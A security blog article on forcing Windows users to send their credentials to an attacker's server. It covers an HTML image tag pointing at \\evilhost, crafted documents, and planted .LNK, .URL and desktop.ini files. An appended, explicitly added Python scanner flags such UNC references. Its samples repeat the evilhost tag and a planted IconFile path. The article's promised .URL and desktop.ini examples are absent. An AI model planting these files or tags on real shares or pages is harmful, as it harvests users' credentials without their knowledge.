Article by Alexey Tuyrin from DSecRG
Today we will talk about client-side attacks. Attacking a network is a gradual process: usually we escalate our privileges step by step, from nothing at all to a domain administrator.
Even ordinary unprivileged users can give us something interesting, for example access to some shared resources. But how can we obtain these users' rights?
We can force users to authenticate to a machine we control. There are at least three main ways to make a user interact with it. They are very general.
1) HTML and browser
We can use social engineering or a MitM attack like DNS poisoning to bring users to our web site containing the following code: `<img src="\\evilhost\test">`
Their browsers will try to fetch the image from our server and hand over their credentials. The users will not notice anything.
2) Crafted document
We can create a special document (like an MS Excel file) and send it to users via e-mail or put it on a shared resource. When a user opens it, the Office application tries to connect to our server and gives us the user's credentials. We will talk about this in the next blog post.
3) Windows Explorer and shared resources
If we have permission to write to some shared resource (for example a file server or a directory on a terminal server), we can create a specially crafted file.
When somebody browses to the folder containing that file, Explorer will try to connect to our server without any interaction from the user.
Such a "specially crafted file" can be:
- .LNK - Windows Shortcut File.
A shortcut can have an icon assigned to it. We can set the icon path to our server, and Explorer will try to download it.
- .URL - Internet Location File.
Like an LNK file, a URL file can have an icon assigned to it, but a URL file is a plain text file. So we write the following text and save it with the .URL extension:
- desktop.ini
This file is used for folder customization. It has several fields (InfoTip, LocalizedResourceName, IconFile, or IconResource on Vista/7) which can carry the necessary links to our server.
Each field affects Explorer differently (you can read about it here: http://www.tarasco.org/security/payload/index.html).
A small limitation is that the folder containing desktop.ini must have the 'system' attribute. It can be set with 'attrib +s folder_name'. But there are some advantages: desktop.ini files are 'hidden' by default, and folders like "My Documents", the root of a drive ("Disc C", D, E, ...) and "Desktop" are 'system' by default.
Simple example of desktop.ini:
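From the defender's side, the common thread in items 1 and 3 is a text artifact (an HTML page, a .URL file, a desktop.ini) carrying a UNC path to a host the organization does not own. The following scanner is an added example, not code from the article or from DSecRG: it extracts UNC hosts from such files and flags any host that is not on an allowlist. The allowlist, the file names and the sample contents (including the host 192.0.2.10 and the key names) are constructed for the example; the INI keys it treats as icon-related are the ones the article names.

```python
"""Flag UNC references to unexpected hosts in desktop.ini, .url and HTML files.
Added defender-side example; allowlist and sample inputs are constructed."""
import re
from typing import Dict, List, Tuple

# A UNC reference as it appears in INI values or HTML attributes: \\host\share...
# The "\\\\+" also catches the doubled-backslash form found inside HTML/JS strings.
UNC_RE = re.compile(r'(?<![\w\\])\\\\+([A-Za-z0-9._-]+)\\[^\s"\'<>]*')

# desktop.ini keys the article names as able to point Explorer at an external host.
ICON_KEYS = {"iconfile", "iconresource", "infotip", "localizedresourcename"}

Finding = Tuple[str, str, str]  # (artifact name, key or context, host)


def find_unc_hosts(text: str) -> List[str]:
    """Return every host named by a UNC path in the text, in order of appearance."""
    return [m.group(1) for m in UNC_RE.finditer(text)]


def scan_artifact(name: str, text: str, allowed_hosts: set) -> List[Finding]:
    """Return one finding per UNC host that is not on the allowlist.

    INI-style files (.ini, .url) are checked value by value so the offending
    key is reported; anything else (HTML and the like) is scanned as a blob.
    """
    findings: List[Finding] = []
    if name.lower().endswith((".ini", ".url")):
        for line in text.splitlines():
            if "=" not in line:
                continue  # section header or comment
            key, _, value = line.partition("=")
            for host in find_unc_hosts(value):
                if host.lower() not in allowed_hosts:
                    findings.append((name, key.strip(), host))
    else:
        for host in find_unc_hosts(text):
            if host.lower() not in allowed_hosts:
                findings.append((name, "<body>", host))
    return findings


def is_icon_key(key: str) -> bool:
    """True if the INI key is one Explorer reads for folder customization."""
    return key.lower() in ICON_KEYS


def scan_all(artifacts: Dict[str, str], allowed_hosts: set) -> List[Finding]:
    """Scan a mapping of file name -> content and concatenate the findings."""
    results: List[Finding] = []
    for name, text in artifacts.items():
        results.extend(scan_artifact(name, text, allowed_hosts))
    return results


# Constructed sample inputs: one planted desktop.ini, one benign .url file,
# one HTML page with an image on a foreign host, one desktop.ini on the
# legitimate file server.  Hosts and paths are invented for the example.
SAMPLE_ARTIFACTS = {
    "desktop.ini": "[.ShellClassInfo]\r\nIconFile=\\\\192.0.2.10\\share\\folder.ico\r\nIconIndex=0\r\n",
    "readme.url": "[InternetShortcut]\r\nURL=https://intranet.example/\r\n",
    "index.html": '<html><body><img src="\\\\evilhost\\test"></body></html>',
    "clean.ini": "[.ShellClassInfo]\r\nIconFile=\\\\fileserver01\\icons\\blue.ico\r\n",
}
ALLOWED_HOSTS = {"fileserver01"}  # constructed allowlist of servers we own

if __name__ == "__main__":
    for artifact, key, host in scan_all(SAMPLE_ARTIFACTS, ALLOWED_HOSTS):
        tag = " (icon/customization key)" if is_icon_key(key) else ""
        print(f"{artifact}: {key} -> \\\\{host}{tag}")
```

Run it over the contents of a share (reading each desktop.ini, .url and .html into the mapping) and every hit names the file, the field and the foreign host; pairing those hits with the share's write permissions tells you who could have planted the file. LNK files are binary and need a proper parser, so they are outside this scanner.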
Cross-posted from Digital Security Research Group